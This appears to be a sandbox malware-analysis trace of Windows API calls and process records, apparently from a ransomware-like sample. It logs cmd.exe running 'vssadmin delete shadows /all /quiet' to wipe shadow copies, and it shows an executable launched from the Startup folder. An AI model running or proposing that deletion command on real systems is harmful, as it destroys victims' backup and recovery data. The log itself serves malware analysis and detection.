[0171.902] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0171.902] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0171.903] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0171.903] GetProcessHeap () returned 0x1916fa10000 [0171.903] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa17610) returned 1 [0171.903] GetProcessHeap () returned 0x1916fa10000 [0171.904] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x12) returned 0x1916fa17610 [0171.904] _get_osfhandle (_FileHandle=1) returned 0x254 [0171.904] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0171.904] _get_osfhandle (_FileHandle=0) returned 0x248 [0171.904] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0171.904] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x4253cfee50*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4253cfee28 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x4253cfee28*(hProcess=0x94, hThread=0x98, dwProcessId=0xf98, dwThreadId=0xf9c)) returned 1 [0172.303] CloseHandle (hObject=0x98) returned 1 [0172.303] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0172.303] GetProcessHeap () returned 0x1916fa10000 [0172.303] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa2b6b0) returned 1 [0172.303] GetEnvironmentStringsW () returned 0x1916fa2ab80* [0172.303] GetProcessHeap () returned 0x1916fa10000 [0172.303] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb24) returned 0x1916fa2b6b0 [0172.303] FreeEnvironmentStringsA (penv="=") returned 1 [0172.303] NtQueryInformationProcess (in: ProcessHandle=0x94, ProcessInformationClass=0x0, ProcessInformation=0x4253cfe328, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x4253cfe328, ReturnLength=0x0) returned 0x0 [0172.303] ReadProcessMemory (in: hProcess=0x94, lpBaseAddress=0x6ee1c10000, lpBuffer=0x4253cfe360, nSize=0x7a0, lpNumberOfBytesRead=0x4253cfe320 | out: lpBuffer=0x4253cfe360*, lpNumberOfBytesRead=0x4253cfe320*=0x7a0) returned 1 [0172.303] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0176.782] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0x4253cfeda8 | out: lpExitCode=0x4253cfeda8*=0x2) returned 1 [0176.782] CloseHandle (hObject=0x94) returned 1 [0176.782] _vsnwprintf (in: _Buffer=0x4253cfef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x4253cfedb8 | out: _Buffer="00000002") returned 8 [0176.782] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0176.782] GetProcessHeap () returned 0x1916fa10000 [0176.782] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa2b6b0) returned 1 [0176.782] GetEnvironmentStringsW () returned 0x1916fa2ab80* [0176.782] GetProcessHeap () returned 0x1916fa10000 [0176.782] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb24) returned 0x1916fa2b6b0 [0176.782] FreeEnvironmentStringsA (penv="=") returned 1 [0176.782] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0176.782] GetProcessHeap () returned 0x1916fa10000 [0176.782] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa2b6b0) returned 1 [0176.782] GetEnvironmentStringsW () returned 0x1916fa2ab80* [0176.782] GetProcessHeap () returned 0x1916fa10000 [0176.782] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb24) returned 0x1916fa2b6b0 [0176.782] FreeEnvironmentStringsA (penv="=") returned 1 [0176.782] GetProcessHeap () returned 0x1916fa10000 [0176.782] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa17610) returned 1 [0176.782] DeleteProcThreadAttributeList (in: lpAttributeList=0x4253cfef30 | out: lpAttributeList=0x4253cfef30) [0176.782] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0176.988] ??_V@YAXPEAX@Z () returned 0x1 [0176.988] _get_osfhandle (_FileHandle=1) returned 0x254 [0176.988] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0176.988] _get_osfhandle (_FileHandle=1) returned 0x254 [0176.988] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0176.988] _get_osfhandle (_FileHandle=0) returned 0x248 [0176.988] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0176.988] GetConsoleOutputCP () returned 0x4e3 [0177.047] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0177.047] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.055] GetProcessHeap () returned 0x1916fa10000 [0177.055] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa29040) returned 1 [0177.055] GetProcessHeap () returned 0x1916fa10000 [0177.055] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa29b70) returned 1 [0177.055] GetProcessHeap () returned 0x1916fa10000 [0177.055] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa28e80) returned 1 [0177.055] GetProcessHeap () returned 0x1916fa10000 [0177.055] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa2c1e0) returned 1 [0177.055] GetProcessHeap () returned 0x1916fa10000 [0177.055] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa292b0) returned 1 [0177.056] GetProcessHeap () returned 0x1916fa10000 [0177.056] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18e90) returned 1 [0177.056] GetProcessHeap () returned 0x1916fa10000 [0177.056] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa29260) returned 1 [0177.056] GetProcessHeap () returned 0x1916fa10000 [0177.056] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16330) returned 1 [0177.056] GetProcessHeap () returned 0x1916fa10000 [0177.056] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa291a0) returned 1 [0177.056] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x4253cff358 | out: _Buffer="\r\n") returned 2 [0177.056] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.056] GetFileType (hFile=0x254) returned 0x3 [0177.056] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.056] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0177.056] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4253cff328, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff328*=0x2, lpOverlapped=0x0) returned 1 [0177.056] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0177.056] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb10080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0177.056] _vsnwprintf (in: _Buffer=0x1916fb20060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x4253cff368 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0177.056] _vsnwprintf (in: _Buffer=0x1916fb20086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x4253cff368 | out: _Buffer=">") returned 1 [0177.056] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.056] GetFileType (hFile=0x254) returned 0x3 [0177.056] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.056] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0177.057] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4253cff358, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff358*=0x14, lpOverlapped=0x0) returned 1 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] GetFileType (hFile=0x248) returned 0x3 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.057] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0177.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.057] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0177.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.057] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0177.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.057] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0177.057] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0177.057] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.057] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.057] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0177.058] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0177.058] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.058] GetFileType (hFile=0x248) returned 0x3 [0177.058] _get_osfhandle (_FileHandle=0) returned 0x248 [0177.058] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0177.058] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.058] GetFileType (hFile=0x254) returned 0x3 [0177.058] _get_osfhandle (_FileHandle=1) returned 0x254 [0177.058] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0177.058] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4253cff658, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff658*=0x5, lpOverlapped=0x0) returned 1 [0177.058] GetProcessHeap () returned 0x1916fa10000 [0177.058] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x4012) returned 0x1916fa18e90 [0177.058] GetProcessHeap () returned 0x1916fa10000 [0177.058] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18e90) returned 1 [0177.059] _wcsicmp (_String1="Exit", _String2=")") returned 60 [0177.059] _wcsicmp (_String1="FOR", _String2="Exit") returned 1 [0177.059] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1 [0177.059] _wcsicmp (_String1="IF", _String2="Exit") returned 4 [0177.059] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4 [0177.059] _wcsicmp (_String1="REM", _String2="Exit") returned 13 [0177.059] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13 [0177.059] GetProcessHeap () returned 0x1916fa10000 [0177.059] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb0) returned 0x1916fa10730 [0177.059] GetProcessHeap () returned 0x1916fa10000 [0177.059] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1a) returned 0x1916fa16330 [0177.060] GetConsoleOutputCP () returned 0x4e3 [0177.231] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0177.231] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.321] GetConsoleTitleW (in: lpConsoleTitle=0x4253cff4a0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0177.415] malloc (_Size=0xffce) returned 0x1916fb30840 [0177.415] ??_V@YAXPEAX@Z () returned 0x1916fb30840 [0177.415] malloc (_Size=0xffce) returned 0x1916fb40820 [0177.415] ??_V@YAXPEAX@Z () returned 0x1916fb40820 [0177.415] _wcsicmp (_String1="Exit", _String2="DIR") returned 1 [0177.415] _wcsicmp (_String1="Exit", _String2="ERASE") returned 6 [0177.415] _wcsicmp (_String1="Exit", _String2="DEL") returned 1 [0177.415] _wcsicmp (_String1="Exit", _String2="TYPE") returned -15 [0177.415] _wcsicmp (_String1="Exit", _String2="COPY") returned 2 [0177.415] _wcsicmp (_String1="Exit", _String2="CD") returned 2 [0177.415] _wcsicmp (_String1="Exit", _String2="CHDIR") returned 2 [0177.416] _wcsicmp (_String1="Exit", _String2="RENAME") returned -13 [0177.416] _wcsicmp (_String1="Exit", _String2="REN") returned -13 [0177.416] _wcsicmp (_String1="Exit", _String2="ECHO") returned 21 [0177.416] _wcsicmp (_String1="Exit", _String2="SET") returned -14 [0177.416] _wcsicmp (_String1="Exit", _String2="PAUSE") returned -11 [0177.416] _wcsicmp (_String1="Exit", _String2="DATE") returned 1 [0177.416] _wcsicmp (_String1="Exit", _String2="TIME") returned -15 [0177.416] _wcsicmp (_String1="Exit", _String2="PROMPT") returned -11 [0177.416] _wcsicmp (_String1="Exit", _String2="MD") returned -8 [0177.416] _wcsicmp (_String1="Exit", _String2="MKDIR") returned -8 [0177.416] _wcsicmp (_String1="Exit", _String2="RD") returned -13 [0177.416] _wcsicmp (_String1="Exit", _String2="RMDIR") returned -13 [0177.416] _wcsicmp (_String1="Exit", _String2="PATH") returned -11 [0177.416] _wcsicmp (_String1="Exit", _String2="GOTO") returned -2 [0177.416] _wcsicmp (_String1="Exit", _String2="SHIFT") returned -14 [0177.416] _wcsicmp (_String1="Exit", _String2="CLS") returned 2 [0177.416] _wcsicmp (_String1="Exit", _String2="CALL") returned 2 [0177.416] _wcsicmp (_String1="Exit", _String2="VERIFY") returned -17 [0177.416] _wcsicmp (_String1="Exit", _String2="VER") returned -17 [0177.416] _wcsicmp (_String1="Exit", _String2="VOL") returned -17 [0177.416] _wcsicmp (_String1="Exit", _String2="EXIT") returned 0 [0177.416] ??_V@YAXPEAX@Z () returned 0x1 [0177.416] GetProcessHeap () returned 0x1916fa10000 [0177.416] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x14) returned 0x1916fa17610 [0177.416] GetProcessHeap () returned 0x1916fa10000 [0177.416] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1a) returned 0x1916fa16500 [0177.416] GetProcessHeap () returned 0x1916fa10000 [0177.416] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x21c) returned 0x1916fa177c0 [0177.416] GetConsoleTitleW (in: lpConsoleTitle=0x1916fa177d0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0177.549] GetProcessHeap () returned 0x1916fa10000 [0177.549] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa177c0, Size=0x64) returned 0x1916fa177c0 [0177.549] GetProcessHeap () returned 0x1916fa10000 [0177.549] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa177c0) returned 0x64 [0177.549] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe - Exit") returned 1 [0177.628] GetProcessHeap () returned 0x1916fa10000 [0177.628] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa177c0) returned 1 [0177.628] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0177.677] exit (_Code=2) Thread: id = 57 os_tid = 0xec0 Process: id = "8" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x50c21000" os_pid = "0xe64" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xe40" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0xe68 Thread: id = 41 os_tid = 0xe70 Thread: id = 52 os_tid = 0xea8 Thread: id = 53 os_tid = 0xeac Thread: id = 54 os_tid = 0xeb0 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5a63a000" os_pid = "0x57c" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xe24" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000eb6d" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 62 os_tid = 0x76c Thread: id = 63 os_tid = 0x95c Thread: id = 64 os_tid = 0x9b0 Thread: id = 65 os_tid = 0x9a8 Thread: id = 66 os_tid = 0x9a4 Thread: id = 67 os_tid = 0x67c Thread: id = 68 os_tid = 0x674 Thread: id = 69 os_tid = 0x5e8 Thread: id = 70 os_tid = 0x5e4 Thread: id = 71 os_tid = 0x5dc Thread: id = 72 os_tid = 0x580 Process: id = "10" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x7a82d000" os_pid = "0xed8" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xe40" cmd_line = "mode con cp select=1251" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 73 os_tid = 0xedc Thread: id = 74 os_tid = 0xee0 Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7930000" os_pid = "0xf98" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xe40" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 75 os_tid = 0xf9c Thread: id = 76 os_tid = 0xfb8 Thread: id = 77 os_tid = 0xfc4 Thread: id = 78 os_tid = 0xfd0 Thread: id = 79 os_tid = 0xfd4 Process: id = "12" image_name = "hgaibc.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe" page_root = "0x585b000" os_pid = "0x2a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe24" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe\" -a" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0xc24 [0177.306] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77050000 [0177.306] GetProcAddress (hModule=0x77050000, lpProcName="GetProcAddress") returned 0x770651b0 [0177.306] GetProcAddress (hModule=0x77050000, lpProcName="GetModuleHandleW") returned 0x770650d0 